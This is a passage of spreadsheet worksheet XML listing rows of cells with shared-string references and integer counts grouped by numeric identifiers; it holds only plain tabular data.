      </c>
      <c r="D6840">
        <v>667</v>
      </c>
    </row>
    <row r="6841" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6841" t="s">
        <v>16228</v>
      </c>
      <c r="B6841" t="s">
        <v>16217</v>
      </c>
      <c r="C6841">
        <v>15</v>
      </c>
      <c r="D6841">
        <v>667</v>
      </c>
    </row>
    <row r="6842" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6842" t="s">
        <v>16231</v>
      </c>
      <c r="B6842" t="s">
        <v>16218</v>
      </c>
      <c r="C6842">
        <v>5</v>
      </c>
      <c r="D6842">
        <v>667</v>
      </c>
    </row>
    <row r="6843" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6843" t="s">
        <v>16229</v>
      </c>
      <c r="B6843" t="s">
        <v>16219</v>
      </c>
      <c r="C6843">
        <v>0</v>
      </c>
      <c r="D6843">
        <v>667</v>
      </c>
    </row>
    <row r="6844" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6844" t="s">
        <v>16230</v>
      </c>
      <c r="B6844" t="s">
        <v>16220</v>
      </c>
      <c r="C6844">
        <v>0</v>
      </c>
      <c r="D6844">
        <v>667</v>
      </c>
    </row>
    <row r="6845" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6845" t="s">
        <v>16229</v>
      </c>
      <c r="B6845" t="s">
        <v>16221</v>
      </c>
      <c r="C6845">
        <v>8</v>
      </c>
      <c r="D6845">
        <v>667</v>
      </c>
    </row>
    <row r="6846" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6846" t="s">
        <v>16230</v>
      </c>
      <c r="B6846" t="s">
        <v>16222</v>
      </c>
      <c r="C6846">
        <v>2</v>
      </c>
      <c r="D6846">
        <v>667</v>
      </c>
    </row>
    <row r="6847" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6847" t="s">
        <v>16223</v>
      </c>
      <c r="B6847" t="s">
        <v>16223</v>
      </c>
      <c r="C6847">
        <v>26</v>
      </c>
      <c r="D6847">
        <v>667</v>
      </c>
    </row>
    <row r="6848" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6848" t="s">
        <v>16224</v>
      </c>
      <c r="B6848" t="s">
        <v>16224</v>
      </c>
      <c r="C6848">
        <v>1</v>
      </c>
      <c r="D6848">
        <v>667</v>
      </c>
    </row>
    <row r="6849" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6849" t="s">
        <v>16228</v>
      </c>
      <c r="B6849" t="s">
        <v>16211</v>
      </c>
      <c r="C6849">
        <v>2</v>
      </c>
      <c r="D6849">
        <v>137</v>
      </c>
    </row>
    <row r="6850" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6850" t="s">
        <v>16231</v>
      </c>
      <c r="B6850" t="s">
        <v>16212</v>
      </c>
      <c r="C6850">
        <v>0</v>
      </c>
      <c r="D6850">
        <v>137</v>
      </c>
    </row>
    <row r="6851" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6851" t="s">
        <v>16228</v>
      </c>
      <c r="B6851" t="s">
        <v>16213</v>
      </c>
      <c r="C6851">
        <v>0</v>
      </c>
      <c r="D6851">
        <v>137</v>
      </c>
    </row>
    <row r="6852" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6852" t="s">
        <v>16231</v>
      </c>
      <c r="B6852" t="s">
        <v>16214</v>
      </c>
      <c r="C6852">
        <v>0</v>
      </c>
      <c r="D6852">
        <v>137</v>
      </c>
    </row>
    <row r="6853" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6853" t="s">
        <v>16228</v>
      </c>
      <c r="B6853" t="s">
        <v>16215</v>
      </c>
      <c r="C6853">
        <v>4</v>
      </c>
      <c r="D6853">
        <v>137</v>
      </c>
    </row>
    <row r="6854" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6854" t="s">
        <v>16231</v>
      </c>
      <c r="B6854" t="s">
        <v>16216</v>
      </c>
      <c r="C6854">
        <v>8</v>
      </c>
      <c r="D6854">
        <v>137</v>
      </c>
    </row>
    <row r="6855" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6855" t="s">
        <v>16228</v>
      </c>
      <c r="B6855" t="s">
        <v>16217</v>
      </c>
      <c r="C6855">
        <v>10</v>
      </c>
      <c r="D6855">
        <v>137</v>
      </c>
    </row>
    <row r="6856" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6856" t="s">
        <v>16231</v>
      </c>
      <c r="B6856" t="s">
        <v>16218</v>
      </c>
      <c r="C6856">
        <v>14</v>
      </c>
      <c r="D6856">
        <v>137</v>
      </c>
    </row>
    <row r="6857" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6857" t="s">
        <v>16229</v>
      </c>
      <c r="B6857" t="s">
        <v>16219</v>
      </c>
      <c r="C6857">
        <v>0</v>
      </c>
      <c r="D6857">
        <v>137</v>
      </c>
    </row>
    <row r="6858" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6858" t="s">
        <v>16230</v>
      </c>
      <c r="B6858" t="s">
        <v>16220</v>
      </c>
      <c r="C6858">
        <v>0</v>
      </c>
      <c r="D6858">
        <v>137</v>
      </c>
    </row>
    <row r="6859" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6859" t="s">
        <v>16229</v>
      </c>
      <c r="B6859" t="s">
        <v>16221</v>
      </c>
      <c r="C6859">
        <v>4</v>
      </c>
      <c r="D6859">
        <v>137</v>
      </c>
    </row>
    <row r="6860" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6860" t="s">
        <v>16230</v>
      </c>
      <c r="B6860" t="s">
        <v>16222</v>
      </c>
      <c r="C6860">
        <v>38</v>
      </c>
      <c r="D6860">
        <v>137</v>
      </c>
    </row>
    <row r="6861" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6861" t="s">
        <v>16223</v>
      </c>
      <c r="B6861" t="s">
        <v>16223</v>
      </c>
      <c r="C6861">
        <v>25</v>
      </c>
      <c r="D6861">
        <v>137</v>
      </c>
    </row>
    <row r="6862" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6862" t="s">
        <v>16224</v>
      </c>
      <c r="B6862" t="s">
        <v>16224</v>
      </c>
      <c r="C6862">
        <v>1</v>
      </c>
      <c r="D6862">
        <v>137</v>
      </c>
    </row>
    <row r="6863" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6863" t="s">
        <v>16228</v>
      </c>
      <c r="B6863" t="s">
        <v>16211</v>
      </c>
      <c r="C6863">
        <v>0</v>
      </c>
      <c r="D6863">
        <v>1026</v>
      </c>
    </row>
    <row r="6864" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6864" t="s">
        <v>16231</v>
      </c>
      <c r="B6864" t="s">
        <v>16212</v>
      </c>
      <c r="C6864">
        <v>0</v>
      </c>
      <c r="D6864">
        <v>1026</v>
      </c>
    </row>
    <row r="6865" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6865" t="s">
        <v>16228</v>
      </c>
      <c r="B6865" t="s">
        <v>16213</v>
      </c>
      <c r="C6865">
        <v>0</v>
      </c>
      <c r="D6865">
        <v>1026</v>
      </c>
    </row>
    <row r="6866" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6866" t="s">
        <v>16231</v>
      </c>
      <c r="B6866" t="s">
        <v>16214</v>
      </c>
      <c r="C6866">
        <v>0</v>
      </c>
      <c r="D6866">
        <v>1026</v>
      </c>
    </row>
    <row r="6867" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6867" t="s">
        <v>16228</v>
      </c>
      <c r="B6867" t="s">
        <v>16215</v>
      </c>
      <c r="C6867">
        <v>1</v>
      </c>
      <c r="D6867">
        <v>1026</v>
      </c>
    </row>
    <row r="6868" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6868" t="s">
        <v>16231</v>
      </c>
      <c r="B6868" t="s">
        <v>16216</v>
      </c>
      <c r="C6868">
        <v>3</v>
      </c>
      <c r="D6868">
        <v>1026</v>
      </c>
    </row>
    <row r="6869" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6869" t="s">
        <v>16228</v>
      </c>
      <c r="B6869" t="s">
        <v>16217</v>
      </c>
      <c r="C6869">
        <v>5</v>
      </c>
      <c r="D6869">
        <v>1026</v>
      </c>
    </row>
    <row r="6870" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6870" t="s">
        <v>16231</v>
      </c>
      <c r="B6870" t="s">
        <v>16218</v>
      </c>
      <c r="C6870">
        <v>1</v>
      </c>
      <c r="D6870">
        <v>1026</v>
      </c>
    </row>
    <row r="6871" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6871" t="s">
        <v>16229</v>
      </c>
      <c r="B6871" t="s">
        <v>16219</v>
      </c>
      <c r="C6871">
        <v>0</v>
      </c>
      <c r="D6871">
        <v>1026</v>
      </c>
    </row>
    <row r="6872" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6872" t="s">
        <v>16230</v>
      </c>
      <c r="B6872" t="s">
        <v>16220</v>
      </c>
      <c r="C6872">
        <v>0</v>
      </c>
      <c r="D6872">
        <v>1026</v>
      </c>
    </row>
    <row r="6873" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6873" t="s">
        <v>16229</v>
      </c>
      <c r="B6873" t="s">
        <v>16221</v>
      </c>
      <c r="C6873">
        <v>35</v>
      </c>
      <c r="D6873">
        <v>1026</v>
      </c>
    </row>
    <row r="6874" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6874" t="s">
        <v>16230</v>
      </c>
      <c r="B6874" t="s">
        <v>16222</v>
      </c>
      <c r="C6874">
        <v>60</v>
      </c>
      <c r="D6874">
        <v>1026</v>
      </c>
    </row>
    <row r="6875" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6875" t="s">
        <v>16223</v>
      </c>
      <c r="B6875" t="s">
        <v>16223</v>
      </c>
      <c r="C6875">
        <v>26</v>
      </c>
      <c r="D6875">
        <v>1026</v>
      </c>
    </row>
    <row r="6876" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6876" t="s">
        <v>16224</v>
      </c>
      <c r="B6876" t="s">
        <v>16224</v>
      </c>
      <c r="C6876">
        <v>0</v>
      </c>
      <c r="D6876">
        <v>1026</v>
      </c>
    </row>
    <row r="6877" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6877" t="s">
        <v>16228</v>
      </c>
      <c r="B6877" t="s">
        <v>16211</v>
      </c>
      <c r="C6877">
        <v>1</v>
      </c>
      <c r="D6877">
        <v>769</v>
      </c>
    </row>
    <row r="6878" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6878" t="s">
        <v>16231</v>
      </c>
      <c r="B6878" t="s">
        <v>16212</v>
      </c>
      <c r="C6878">
        <v>0</v>
      </c>
      <c r="D6878">
        <v>769</v>
      </c>
    </row>
    <row r="6879" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6879" t="s">
        <v>16228</v>
      </c>
      <c r="B6879" t="s">
        <v>16213</v>
      </c>
      <c r="C6879">
        <v>0</v>
      </c>
      <c r="D6879">
        <v>769</v>
      </c>
    </row>
    <row r="6880" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6880" t="s">
        <v>16231</v>
      </c>
      <c r="B6880" t="s">
        <v>16214</v>
      </c>
      <c r="C6880">
        <v>0</v>
      </c>
      <c r="D6880">
        <v>769</v>
      </c>
    </row>
    <row r="6881" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6881" t="s">
        <v>16228</v>
      </c>
      <c r="B6881" t="s">
        <v>16215</v>
      </c>
      <c r="C6881">
        <v>3</v>
      </c>
      <c r="D6881">
        <v>769</v>
      </c>
    </row>
    <row r="6882" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6882" t="s">
        <v>16231</v>
      </c>
      <c r="B6882" t="s">
        <v>16216</v>
      </c>
      <c r="C6882">
        <v>16</v>
      </c>
      <c r="D6882">
        <v>769</v>
      </c>
    </row>
    <row r="6883" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6883" t="s">
        <v>16228</v>
      </c>
      <c r="B6883" t="s">
        <v>16217</v>
      </c>
      <c r="C6883">
        <v>43</v>
      </c>
      <c r="D6883">
        <v>769</v>
      </c>
    </row>
    <row r="6884" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6884" t="s">
        <v>16231</v>
      </c>
      <c r="B6884" t="s">
        <v>16218</v>
      </c>
      <c r="C6884">
        <v>0</v>
      </c>
      <c r="D6884">
        <v>769</v>
      </c>
    </row>
    <row r="6885" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6885" t="s">
        <v>16229</v>
      </c>
      <c r="B6885" t="s">
        <v>16219</v>
      </c>
      <c r="C6885">
        <v>2</v>
      </c>
      <c r="D6885">
        <v>769</v>
      </c>
    </row>
    <row r="6886" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6886" t="s">
        <v>16230</v>
      </c>
      <c r="B6886" t="s">
        <v>16220</v>
      </c>
      <c r="C6886">
        <v>3</v>
      </c>
      <c r="D6886">
        <v>769</v>
      </c>
    </row>
    <row r="6887" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6887" t="s">
        <v>16229</v>
      </c>
      <c r="B6887" t="s">
        <v>16221</v>
      </c>
      <c r="C6887">
        <v>0</v>
      </c>
      <c r="D6887">
        <v>769</v>
      </c>
    </row>
    <row r="6888" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6888" t="s">
        <v>16230</v>
      </c>
      <c r="B6888" t="s">
        <v>16222</v>
      </c>
      <c r="C6888">
        <v>0</v>
      </c>
      <c r="D6888">
        <v>769</v>
      </c>
    </row>
    <row r="6889" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6889" t="s">
        <v>16223</v>
      </c>
      <c r="B6889" t="s">
        <v>16223</v>
      </c>
      <c r="C6889">
        <v>26</v>
      </c>
      <c r="D6889">
        <v>769</v>
      </c>
    </row>
    <row r="6890" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6890" t="s">
        <v>16224</v>
      </c>
      <c r="B6890" t="s">
        <v>16224</v>
      </c>
      <c r="C6890">
        <v>1</v>
      </c>
      <c r="D6890">
        <v>769</v>
      </c>
    </row>
    <row r="6891" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6891" t="s">
        <v>16228</v>
      </c>
      <c r="B6891" t="s">
        <v>16211</v>
      </c>
      <c r="C6891">
        <v>0</v>
      </c>
      <c r="D6891">
        <v>2785</v>
      </c>
    </row>
    <row r="6892" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6892" t="s">
        <v>16231</v>
      </c>
      <c r="B6892" t="s">
        <v>16212</v>
      </c>
      <c r="C6892">
        <v>0</v>
      </c>
      <c r="D6892">
        <v>2785</v>
      </c>
    </row>
    <row r="6893" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6893" t="s">
        <v>16228</v>
      </c>
      <c r="B6893" t="s">
        <v>16213</v>
      </c>
      <c r="C6893">
        <v>0</v>
      </c>
      <c r="D6893">
        <v>2785</v>
      </c>
    </row>
    <row r="6894" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6894" t="s">
        <v>16231</v>
      </c>
      <c r="B6894" t="s">
        <v>16214</v>
      </c>
      <c r="C6894">
        <v>0</v>
      </c>
      <c r="D6894">
        <v>2785</v>
      </c>
    </row>
    <row r="6895" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6895" t="s">
        <v>16228</v>
      </c>
      <c r="B6895" t="s">
        <v>16215</v>
      </c>
      <c r="C6895">
        <v>0</v>
      </c>
      <c r="D6895">
        <v>2785</v>
      </c>
    </row>
    <row r="6896" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6896" t="s">
        <v>16231</v>
      </c>
      <c r="B6896" t="s">
        <v>16216</v>
      </c>
      <c r="C6896">
        <v>0</v>
      </c>
      <c r="D6896">
        <v>2785</v>
      </c>
    </row>
    <row r="6897" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6897" t="s">
        <v>16228</v>
      </c>
      <c r="B6897" t="s">
        <v>16217</v>
      </c>
      <c r="C6897">
        <v>0</v>
      </c>
      <c r="D6897">
        <v>2785</v>
      </c>
    </row>
    <row r="6898" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6898" t="s">
        <v>16231</v>
      </c>
      <c r="B6898" t="s">
        <v>16218</v>
      </c>
      <c r="C6898">
        <v>0</v>
      </c>
      <c r="D6898">
        <v>2785</v>
      </c>
    </row>
    <row r="6899" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6899" t="s">
        <v>16229</v>
      </c>
      <c r="B6899" t="s">
        <v>16219</v>
      </c>
      <c r="C6899">
        <v>0</v>
      </c>
      <c r="D6899">
        <v>2785</v>
      </c>
    </row>
    <row r="6900" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6900" t="s">
        <v>16230</v>
      </c>
      <c r="B6900" t="s">
        <v>16220</v>
      </c>
      <c r="C6900">
        <v>0</v>
      </c>
      <c r="D6900">
        <v>2785</v>
      </c>
    </row>
    <row r="6901" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6901" t="s">
        <v>16229</v>
      </c>
      <c r="B6901" t="s">
        <v>16221</v>
      </c>
      <c r="C6901">
        <v>0</v>
      </c>
      <c r="D6901">
        <v>2785</v>
      </c>
    </row>
    <row r="6902" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6902" t="s">
        <v>16230</v>
      </c>
      <c r="B6902" t="s">
        <v>16222</v>
      </c>
      <c r="C6902">
        <v>0</v>
      </c>
      <c r="D6902">
        <v>2785</v>
      </c>
    </row>
    <row r="6903" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6903" t="s">
        <v>16223</v>
      </c>
      <c r="B6903" t="s">
        <v>16223</v>
      </c>
      <c r="C6903">
        <v>0</v>
      </c>
      <c r="D6903">
        <v>2785</v>
      </c>
    </row>
    <row r="6904" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6904" t="s">
        <v>16224</v>
      </c>
      <c r="B6904" t="s">
        <v>16224</v>
      </c>
      <c r="C6904">
        <v>0</v>
      </c>
      <c r="D6904">
        <v>2785</v>
      </c>
    </row>
    <row r="6905" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6905" t="s">
        <v>16228</v>
      </c>
      <c r="B6905" t="s">
        <v>16215</v>
      </c>
      <c r="C6905">
        <v>1</v>
      </c>
      <c r="D6905">
        <v>2785</v>
      </c>
    </row>
    <row r="6906" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6906" t="s">
        <v>16231</v>
      </c>
      <c r="B6906" t="s">
        <v>16216</v>
      </c>
      <c r="C6906">
        <v>1</v>
      </c>
      <c r="D6906">
        <v>2785</v>
      </c>
    </row>
    <row r="6907" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6907" t="s">
        <v>16231</v>
      </c>
      <c r="B6907" t="s">
        <v>16218</v>
      </c>
      <c r="C6907">
        <v>2</v>
      </c>
      <c r="D6907">
        <v>2785</v>
      </c>
    </row>
    <row r="6908" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6908" t="s">
        <v>16228</v>
      </c>
      <c r="B6908" t="s">
        <v>16211</v>
      </c>
      <c r="C6908">
        <v>0</v>
      </c>
      <c r="D6908">
        <v>2755</v>
      </c>
    </row>
    <row r="6909" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6909" t="s">
        <v>16231</v>
      </c>
      <c r="B6909" t="s">
        <v>16212</v>
      </c>
      <c r="C6909">
        <v>0</v>
      </c>
      <c r="D6909">
        <v>2755</v>
      </c>
    </row>
    <row r="6910" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6910" t="s">
        <v>16228</v>
      </c>
      <c r="B6910" t="s">
        <v>16213</v>
      </c>
      <c r="C6910">
        <v>0</v>
      </c>
      <c r="D6910">
        <v>2755</v>
      </c>
    </row>
    <row r="6911" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6911" t="s">
        <v>16231</v>
      </c>
      <c r="B6911" t="s">
        <v>16214</v>
      </c>
      <c r="C6911">
        <v>0</v>
      </c>
      <c r="D6911">
        <v>2755</v>
      </c>
    </row>
    <row r="6912" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6912" t="s">
        <v>16228</v>
      </c>
      <c r="B6912" t="s">
        <v>16215</v>
      </c>
      <c r="C6912">
        <v>13</v>
      </c>
      <c r="D6912">
        <v>2755</v>
      </c>
    </row>
    <row r="6913" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6913" t="s">
        <v>16231</v>
      </c>
      <c r="B6913" t="s">
        <v>16216</v>
      </c>
      <c r="C6913">
        <v>13</v>
      </c>
      <c r="D6913">
        <v>2755</v>
      </c>
    </row>
    <row r="6914" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6914" t="s">
        <v>16228</v>
      </c>
      <c r="B6914" t="s">
        <v>16217</v>
      </c>
      <c r="C6914">
        <v>10</v>
      </c>
      <c r="D6914">
        <v>2755</v>
      </c>
    </row>
    <row r="6915" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6915" t="s">
        <v>16231</v>
      </c>
      <c r="B6915" t="s">
        <v>16218</v>
      </c>
      <c r="C6915">
        <v>71</v>
      </c>
      <c r="D6915">
        <v>2755</v>
      </c>
    </row>
    <row r="6916" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6916" t="s">
        <v>16229</v>
      </c>
      <c r="B6916" t="s">
        <v>16219</v>
      </c>
      <c r="C6916">
        <v>15</v>
      </c>
      <c r="D6916">
        <v>2755</v>
      </c>
    </row>
    <row r="6917" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6917" t="s">
        <v>16230</v>
      </c>
      <c r="B6917" t="s">
        <v>16220</v>
      </c>
      <c r="C6917">
        <v>5</v>
      </c>
      <c r="D6917">
        <v>2755</v>
      </c>
    </row>
    <row r="6918" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6918" t="s">
        <v>16229</v>
      </c>
      <c r="B6918" t="s">
        <v>16221</v>
      </c>
      <c r="C6918">
        <v>47</v>
      </c>
      <c r="D6918">
        <v>2755</v>
      </c>
    </row>
    <row r="6919" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6919" t="s">
        <v>16230</v>
      </c>
      <c r="B6919" t="s">
        <v>16222</v>
      </c>
      <c r="C6919">
        <v>164</v>
      </c>
      <c r="D6919">
        <v>2755</v>
      </c>
    </row>
    <row r="6920" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6920" t="s">
        <v>16223</v>
      </c>
      <c r="B6920" t="s">
        <v>16223</v>
      </c>
      <c r="C6920">
        <v>6</v>
      </c>
      <c r="D6920">
        <v>2755</v>
      </c>
    </row>
    <row r="6921" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6921" t="s">
        <v>16224</v>
      </c>
      <c r="B6921" t="s">
        <v>16224</v>
      </c>
      <c r="C6921">
        <v>1</v>
      </c>
      <c r="D6921">
        <v>2755</v>
      </c>
    </row>
    <row r="6922" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6922" t="s">
        <v>16228</v>
      </c>
      <c r="B6922" t="s">
        <v>16211</v>
      </c>
      <c r="C6922">
        <v>0</v>
      </c>
      <c r="D6922">
        <v>350</v>
      </c>
    </row>
    <row r="6923" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6923" t="s">
        <v>16231</v>
      </c>
      <c r="B6923" t="s">
        <v>16212</v>
      </c>
      <c r="C6923">
        <v>0</v>
      </c>
      <c r="D6923">
        <v>350</v>
      </c>
    </row>
    <row r="6924" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6924" t="s">
        <v>16228</v>
      </c>
      <c r="B6924" t="s">
        <v>16213</v>
      </c>
      <c r="C6924">
        <v>0</v>
      </c>
      <c r="D6924">
        <v>350</v>
      </c>
    </row>
    <row r="6925" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6925" t="s">
        <v>16231</v>
      </c>
      <c r="B6925" t="s">
        <v>16214</v>
      </c>
      <c r="C6925">
        <v>0</v>
      </c>
      <c r="D6925">
        <v>350</v>
      </c>
    </row>
    <row r="6926" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6926" t="s">
        <v>16228</v>
      </c>
      <c r="B6926" t="s">
        <v>16215</v>
      </c>
      <c r="C6926">
        <v>0</v>
      </c>
      <c r="D6926">
        <v>350</v>
      </c>
    </row>
    <row r="6927" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6927" t="s">
        <v>16231</v>
      </c>
      <c r="B6927" t="s">
        <v>16216</v>
      </c>
      <c r="C6927">
        <v>3</v>
      </c>
      <c r="D6927">
        <v>350</v>
      </c>
    </row>
    <row r="6928" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6928" t="s">
        <v>16228</v>
      </c>
      <c r="B6928" t="s">
        <v>16217</v>
      </c>
      <c r="C6928">
        <v>4</v>
      </c>
      <c r="D6928">
        <v>350</v>
      </c>
    </row>
    <row r="6929" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6929" t="s">
        <v>16231</v>
      </c>
      <c r="B6929" t="s">
        <v>16218</v>
      </c>
      <c r="C6929">
        <v>11</v>
      </c>
      <c r="D6929">
        <v>350</v>
      </c>
    </row>
    <row r="6930" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6930" t="s">
        <v>16229</v>
      </c>
      <c r="B6930" t="s">
        <v>16219</v>
      </c>
      <c r="C6930">
        <v>0</v>
      </c>
      <c r="D6930">
        <v>350</v>
      </c>
    </row>
    <row r="6931" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6931" t="s">
        <v>16230</v>
      </c>
      <c r="B6931" t="s">
        <v>16220</v>
      </c>
      <c r="C6931">
        <v>0</v>
      </c>
      <c r="D6931">
        <v>350</v>
      </c>
    </row>
    <row r="6932" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6932" t="s">
        <v>16229</v>
      </c>
      <c r="B6932" t="s">
        <v>16221</v>
      </c>
      <c r="C6932">
        <v>0</v>
      </c>
      <c r="D6932">
        <v>350</v>
      </c>
    </row>
    <row r="6933" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6933" t="s">
        <v>16230</v>
      </c>
      <c r="B6933" t="s">
        <v>16222</v>
      </c>
      <c r="C6933">
        <v>0</v>
      </c>
      <c r="D6933">
        <v>350</v>
      </c>
    </row>
    <row r="6934" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6934" t="s">
        <v>16223</v>
      </c>
      <c r="B6934" t="s">
        <v>16223</v>
      </c>
      <c r="C6934">
        <v>25</v>
      </c>
      <c r="D6934">
        <v>350</v>
      </c>
    </row>
    <row r="6935" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6935" t="s">
        <v>16224</v>
      </c>
      <c r="B6935" t="s">
        <v>16224</v>
      </c>
      <c r="C6935">
        <v>1</v>
      </c>
      <c r="D6935">
        <v>350</v>
      </c>
    </row>
    <row r="6936" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6936" t="s">
        <v>16229</v>
      </c>
      <c r="B6936" t="s">
        <v>16221</v>
      </c>
      <c r="C6936">
        <v>145</v>
      </c>
      <c r="D6936">
        <v>769</v>
      </c>
    </row>
    <row r="6937" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6937" t="s">
        <v>16230</v>
      </c>
      <c r="B6937" t="s">
        <v>16222</v>
      </c>
      <c r="C6937">
        <v>165</v>
      </c>
      <c r="D6937">
        <v>769</v>
      </c>
    </row>
    <row r="6938" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6938" t="s">
        <v>16230</v>
      </c>
      <c r="B6938" t="s">
        <v>16222</v>
      </c>
      <c r="C6938">
        <v>168</v>
      </c>
      <c r="D6938">
        <v>769</v>
      </c>
    </row>
    <row r="6939" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6939" t="s">
        <v>16223</v>
      </c>
      <c r="B6939" t="s">
        <v>16223</v>
      </c>
      <c r="C6939">
        <v>26</v>
      </c>
      <c r="D6939">
        <v>2755</v>
      </c>
    </row>
    <row r="6940" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6940" t="s">
        <v>16228</v>
      </c>
      <c r="B6940" t="s">
        <v>16211</v>
      </c>
      <c r="C6940">
        <v>0</v>
      </c>
      <c r="D6940">
        <v>227</v>
      </c>
    </row>
    <row r="6941" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6941" t="s">
        <v>16231</v>
      </c>
      <c r="B6941" t="s">
        <v>16212</v>
      </c>
      <c r="C6941">
        <v>0</v>
      </c>
      <c r="D6941">
        <v>227</v>
      </c>
    </row>
    <row r="6942" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6942" t="s">
        <v>16228</v>
      </c>
      <c r="B6942" t="s">
        <v>16213</v>
      </c>
      <c r="C6942">
        <v>0</v>
      </c>
      <c r="D6942">
        <v>227</v>
      </c>
    </row>
    <row r="6943" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6943" t="s">
        <v>16231</v>
      </c>
      <c r="B6943" t="s">
        <v>16214</v>
      </c>
      <c r="C6943">
        <v>0</v>
      </c>
      <c r="D6943">
        <v>227</v>
      </c>
    </row>
    <row r="6944" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6944" t="s">
        <v>16228</v>
      </c>
      <c r="B6944" t="s">
        <v>16215</v>
      </c>
      <c r="C6944">
        <v>0</v>
      </c>
      <c r="D6944">
        <v>227</v>
      </c>
    </row>
    <row r="6945" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6945" t="s">
        <v>16231</v>
      </c>
      <c r="B6945" t="s">
        <v>16216</v>
      </c>
      <c r="C6945">
        <v>0</v>
      </c>
      <c r="D6945">
        <v>227</v>
      </c>
    </row>
